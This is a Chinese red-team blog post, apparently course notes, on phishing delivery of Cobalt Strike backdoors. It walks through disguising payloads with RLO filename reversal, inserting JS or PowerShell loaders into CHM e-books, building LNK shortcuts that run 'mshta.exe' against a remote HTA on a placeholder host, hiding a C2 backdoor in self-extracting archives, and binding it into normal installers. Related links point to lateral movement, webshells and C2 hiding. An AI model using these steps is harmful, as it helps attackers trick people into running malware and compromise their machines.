红队APT-钓鱼投递篇&文件程序类&RLO伪装&LNK快捷&自解压运行&捆绑打包&CHM电子书

Ethan医生8个月前信息收集280

 红队APT-文件后缀-钓鱼伪装-RLO

 红队APT-电子书-CHM-加载JS&PS

 红队APT-快捷方式-LNK-加载&HTA

 红队APT-压缩文件-自解压-释放执行

 红队APT-捆绑文件-打包加载-释放执行

#RLO后缀

命令-插入Unicode字符->RLO模式

 image.png

#CHM电子书

CS生成上线:Attacks——>Web Drive by——>Scripted web Delivery

1、执行JS:见打包资源代码

2、上线JS:见打包资源代码

3、CHM伪装:

找一个正常的CHM电子书,解压后;

将Payload插入其中某个或整个页面;

加载编译,当电子书打开修改页面后上线。

解压命令:hh -decompile .\\html xx.CHM

-bitsadmin 模式

-Powershell 模式

 

#LNK快捷方式:

1、生成:Attacks -> Packages -> Html Application

2、上传:Attacks——>Web Drive by——>Host file

3、执行:C:\Windows\System32\mshta.exe http://xx.xx.xx.xx:xx/x.ext

4、伪装:

-创建快捷方式

image.png

-生成HTA并上传

-属性更改目标执行

-属性更改图标伪装

 

#自解压文件:

安装包&C2后门

1、打包勾选SFX

2、Advanced设置路径

3、Setup设置前后执行

4、Modes设置显示或隐藏

5、Update设置覆盖或更新

6、配合RLO将EXE伪装ZIP压缩

 

#捆绑打包文件:

自带:IExpress

第三方:捆绑器


捆绑比较复杂 因为把正常的程序绑定上去后 会将正常的和后门一起捆绑在一起 导致一起被查杀


相关文章

内网对抗-横向移动篇&入口切换&SMB共享&WMI管道&DCOM组件&Impacket套件&CS插件

➢ 横向移动-WMI服务-条件&明文&HASH➢ 横向移动-SMB服务-条件&明文&HASH➢ 横向移动-DCOM服务-条件&明文...

红队APT-后门逃离篇&无文件内存马&防查杀检测&四种语言&多种框架中间件&自定义生成

➢ 红队APT-后门逃离-无文件内存马&四大语言植入1、出现:在Web安全领域,Webshell一直是一个非常重要且热门的话题。在目前传统安全领域,Webshell根据功能的不同分为...

红队APT-流量隐匿篇&C2工具&反溯源&隐藏源IP&云函数&CDN节点&数据中转&反向代理

➢ 红队APT-流量隐匿-C2证书&特征分析➢ 红队APT-溯源隐藏-C2通讯&中转节点#CDN利用意义:1、用于隐藏上线服务器IP2、节点IP均为厂商上线利用过程...

红队APT-钓鱼投递篇&近源攻击&BadUSB存储&C2上线&Arduino开发&代码植入&免杀方案

➢ 红队APT-近源攻击-BadUSB-上线C2#BADUSB准备工作:1、购买badusb,购买链接:https://detail.tmall.com/item.htm?id=606447...

漏扫项目篇&Poc开发&Rule语法&反链判断&不回显检测&Yaml生成

#Xray-Poc开发-数据回显&RCE不回显&实验室1、开发参考:https://poc.xray.cool/https://docs.xray.cool/#/guide/READM...

蓝队技能-应急响应篇&C2后门&权限维持手法&Windows&Linux基线检查&排查封锁清理

蓝队技能-应急响应篇&C2后门&权限维持手法&Windows&Linux基线检查&排查封锁清理

➢ 蓝队技能-Web入侵-入口&查杀&攻击链等➢ 蓝队技能-C2后门&权限维持-基线检查&查杀封锁#C2后门分析处置&权限维持技术处置#Wi...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。